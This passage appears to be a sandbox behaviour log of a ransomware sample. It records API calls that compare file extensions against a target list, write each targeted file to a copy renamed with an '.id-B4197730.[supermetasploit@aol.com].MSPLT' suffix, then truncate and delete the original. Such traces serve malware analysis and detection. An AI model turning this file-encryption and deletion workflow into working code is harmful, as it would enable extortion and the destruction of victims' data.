(lpString1=".docx", lpString2="a.rtf") returned -1 [0171.665] lstrlenW (lpString=".pdf") returned 4 [0171.665] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0171.665] lstrlenW (lpString=".xls") returned 4 [0171.665] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0171.665] lstrlenW (lpString=".xlsx") returned 5 [0171.665] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0171.665] lstrlenW (lpString=".ppt") returned 4 [0171.665] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0171.665] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0171.665] lstrlenW (lpString=".zip") returned 4 [0171.665] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0171.665] lstrlenW (lpString=".rar") returned 4 [0171.665] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0171.665] lstrlenW (lpString=".bz2") returned 4 [0171.665] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0171.665] lstrlenW (lpString=".7z") returned 3 [0171.665] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0171.665] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0171.665] lstrlenW (lpString=".dbf") returned 4 [0171.665] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0171.666] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0171.666] lstrlenW (lpString=".1cd") returned 4 [0171.666] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0171.666] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0171.666] lstrlenW (lpString=".jpg") returned 4 [0171.666] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0171.666] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0171.666] lstrlenW (lpString="LocalizedData.xml") returned 17 [0171.666] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0171.667] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=77680) returned 1 [0171.667] CloseHandle (hObject=0x350) returned 1 [0171.667] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml")) returned 0x80 [0171.667] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.669] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0171.669] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.669] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.669] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0171.689] GetLastError () returned 0x0 [0171.689] ReadFile (in: hFile=0x2f4, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x12f70, lpOverlapped=0x0) returned 1 [0171.840] WriteFile (in: hFile=0x36c, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x12f80, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x12f80, lpOverlapped=0x0) returned 1 [0171.843] ReadFile (in: hFile=0x2f4, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0171.843] WriteFile (in: hFile=0x36c, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xf6, lpOverlapped=0x0) returned 1 [0171.843] SetEndOfFile (hFile=0x36c) returned 1 [0171.844] CloseHandle (hObject=0x36c) returned 1 [0171.850] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.850] SetEndOfFile (hFile=0x2f4) returned 1 [0171.852] CloseHandle (hObject=0x2f4) returned 1 [0171.852] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0171.852] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml")) returned 1 [0171.853] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0171.853] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0171.853] lstrlenW (lpString=".doc") returned 4 [0171.853] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0171.853] lstrlenW (lpString=".docx") returned 5 [0171.853] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0171.853] lstrlenW (lpString=".pdf") returned 4 [0171.853] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0171.853] lstrlenW (lpString=".xls") returned 4 [0171.853] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0171.853] lstrlenW (lpString=".xlsx") returned 5 [0171.853] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0171.853] lstrlenW (lpString=".ppt") returned 4 [0171.853] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0171.853] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0171.853] lstrlenW (lpString=".zip") returned 4 [0171.853] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0171.853] lstrlenW (lpString=".rar") returned 4 [0171.853] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0171.853] lstrlenW (lpString=".bz2") returned 4 [0171.853] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0171.853] lstrlenW (lpString=".7z") returned 3 [0171.853] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0171.853] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0171.853] lstrlenW (lpString=".dbf") returned 4 [0171.853] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0171.853] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0171.854] lstrlenW (lpString=".1cd") returned 4 [0171.855] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0171.855] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0171.855] lstrlenW (lpString=".jpg") returned 4 [0171.855] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0171.855] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0171.855] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0171.855] lstrlenW (lpString=".doc") returned 4 [0171.855] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0171.855] lstrlenW (lpString=".docx") returned 5 [0171.855] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0171.855] lstrlenW (lpString=".pdf") returned 4 [0171.855] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0171.855] lstrlenW (lpString=".xls") returned 4 [0171.856] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0171.856] lstrlenW (lpString=".xlsx") returned 5 [0171.856] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0171.856] lstrlenW (lpString=".ppt") returned 4 [0171.856] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0171.856] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0171.856] lstrlenW (lpString=".zip") returned 4 [0171.856] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0171.856] lstrlenW (lpString=".rar") returned 4 [0171.856] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0171.856] lstrlenW (lpString=".bz2") returned 4 [0171.856] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0171.856] lstrlenW (lpString=".7z") returned 3 [0171.856] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0171.856] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0171.856] lstrlenW (lpString=".dbf") returned 4 [0171.856] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0171.856] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0171.856] lstrlenW (lpString=".1cd") returned 4 [0171.856] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0171.856] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0171.856] lstrlenW (lpString=".jpg") returned 4 [0171.856] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0171.857] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0171.857] lstrlenW (lpString="LocalizedData.xml") returned 17 [0171.857] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0172.486] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=60684) returned 1 [0172.486] CloseHandle (hObject=0x2e8) returned 1 [0172.486] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml")) returned 0x80 [0172.514] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.514] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0172.514] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.515] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.520] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0172.520] GetLastError () returned 0x0 [0172.520] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0xed0c, lpOverlapped=0x0) returned 1 [0172.523] WriteFile (in: hFile=0x2d4, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xed10, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xed10, lpOverlapped=0x0) returned 1 [0172.525] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0172.525] WriteFile (in: hFile=0x2d4, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xf6, lpOverlapped=0x0) returned 1 [0172.525] SetEndOfFile (hFile=0x2d4) returned 1 [0172.525] CloseHandle (hObject=0x2d4) returned 1 [0172.528] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.528] SetEndOfFile (hFile=0x2e8) returned 1 [0172.529] CloseHandle (hObject=0x2e8) returned 1 [0172.529] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.530] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml")) returned 1 [0172.530] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0172.530] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0172.530] lstrlenW (lpString=".doc") returned 4 [0172.530] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0172.530] lstrlenW (lpString=".docx") returned 5 [0172.530] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0172.530] lstrlenW (lpString=".pdf") returned 4 [0172.530] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0172.530] lstrlenW (lpString=".xls") returned 4 [0172.530] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0172.530] lstrlenW (lpString=".xlsx") returned 5 [0172.530] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0172.530] lstrlenW (lpString=".ppt") returned 4 [0172.530] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0172.530] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0172.530] lstrlenW (lpString=".zip") returned 4 [0172.530] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0172.530] lstrlenW (lpString=".rar") returned 4 [0172.531] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0172.531] lstrlenW (lpString=".bz2") returned 4 [0172.531] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0172.531] lstrlenW (lpString=".7z") returned 3 [0172.531] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0172.531] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0172.531] lstrlenW (lpString=".dbf") returned 4 [0172.531] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0172.531] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0172.531] lstrlenW (lpString=".1cd") returned 4 [0172.531] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0172.531] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0172.531] lstrlenW (lpString=".jpg") returned 4 [0172.531] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0172.531] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0172.531] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0172.531] lstrlenW (lpString=".doc") returned 4 [0172.531] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0172.531] lstrlenW (lpString=".docx") returned 5 [0172.531] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0172.531] lstrlenW (lpString=".pdf") returned 4 [0172.531] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0172.531] lstrlenW (lpString=".xls") returned 4 [0172.531] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0172.531] lstrlenW (lpString=".xlsx") returned 5 [0172.531] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0172.531] lstrlenW (lpString=".ppt") returned 4 [0172.531] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0172.531] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0172.531] lstrlenW (lpString=".zip") returned 4 [0172.531] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0172.531] lstrlenW (lpString=".rar") returned 4 [0172.532] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0172.532] lstrlenW (lpString=".bz2") returned 4 [0172.532] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0172.532] lstrlenW (lpString=".7z") returned 3 [0172.532] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0172.532] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0172.532] lstrlenW (lpString=".dbf") returned 4 [0172.532] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0172.532] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0172.532] lstrlenW (lpString=".1cd") returned 4 [0172.532] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0172.532] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0172.532] lstrlenW (lpString=".jpg") returned 4 [0172.532] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0172.532] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0172.532] lstrlenW (lpString="Parameterinfo.xml") returned 17 [0172.532] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0172.532] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=201796) returned 1 [0172.532] CloseHandle (hObject=0x2e8) returned 1 [0172.532] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml")) returned 0x80 [0172.533] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.533] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0172.533] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.533] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.533] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0172.533] GetLastError () returned 0x0 [0172.533] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x31444, lpOverlapped=0x0) returned 1 [0172.586] WriteFile (in: hFile=0x2d4, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x31450, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x31450, lpOverlapped=0x0) returned 1 [0172.590] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0172.590] WriteFile (in: hFile=0x2d4, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xf6, lpOverlapped=0x0) returned 1 [0172.591] SetEndOfFile (hFile=0x2d4) returned 1 [0172.591] CloseHandle (hObject=0x2d4) returned 1 [0172.596] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.596] SetEndOfFile (hFile=0x2e8) returned 1 [0172.600] CloseHandle (hObject=0x2e8) returned 1 [0172.600] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.600] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml")) returned 1 [0172.601] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0172.601] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0172.601] lstrlenW (lpString=".doc") returned 4 [0172.601] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0172.601] lstrlenW (lpString=".docx") returned 5 [0172.601] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0172.601] lstrlenW (lpString=".pdf") returned 4 [0172.601] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0172.601] lstrlenW (lpString=".xls") returned 4 [0172.601] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0172.601] lstrlenW (lpString=".xlsx") returned 5 [0172.601] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0172.601] lstrlenW (lpString=".ppt") returned 4 [0172.601] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0172.601] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0172.601] lstrlenW (lpString=".zip") returned 4 [0172.601] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0172.601] lstrlenW (lpString=".rar") returned 4 [0172.601] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0172.601] lstrlenW (lpString=".bz2") returned 4 [0172.601] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0172.601] lstrlenW (lpString=".7z") returned 3 [0172.601] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0172.601] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0172.601] lstrlenW (lpString=".dbf") returned 4 [0172.602] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0172.602] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0172.602] lstrlenW (lpString=".1cd") returned 4 [0172.602] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0172.602] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0172.602] lstrlenW (lpString=".jpg") returned 4 [0172.602] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0172.602] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0172.602] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0172.602] lstrlenW (lpString=".doc") returned 4 [0172.602] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0172.602] lstrlenW (lpString=".docx") returned 5 [0172.602] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0172.602] lstrlenW (lpString=".pdf") returned 4 [0172.602] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0172.602] lstrlenW (lpString=".xls") returned 4 [0172.602] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0172.602] lstrlenW (lpString=".xlsx") returned 5 [0172.602] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0172.602] lstrlenW (lpString=".ppt") returned 4 [0172.602] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0172.602] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0172.602] lstrlenW (lpString=".zip") returned 4 [0172.602] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0172.602] lstrlenW (lpString=".rar") returned 4 [0172.602] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0172.602] lstrlenW (lpString=".bz2") returned 4 [0172.602] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0172.602] lstrlenW (lpString=".7z") returned 3 [0172.602] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0172.602] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0172.602] lstrlenW (lpString=".dbf") returned 4 [0172.602] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0172.602] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0172.602] lstrlenW (lpString=".1cd") returned 4 [0172.603] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0172.603] lstrlenW (lpString="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 46 [0172.603] lstrlenW (lpString=".jpg") returned 4 [0172.603] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0172.603] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0172.603] lstrlenW (lpString="UiInfo.xml") returned 10 [0172.603] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0172.833] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=39042) returned 1 [0172.833] CloseHandle (hObject=0x344) returned 1 [0172.833] GetFileAttributesW 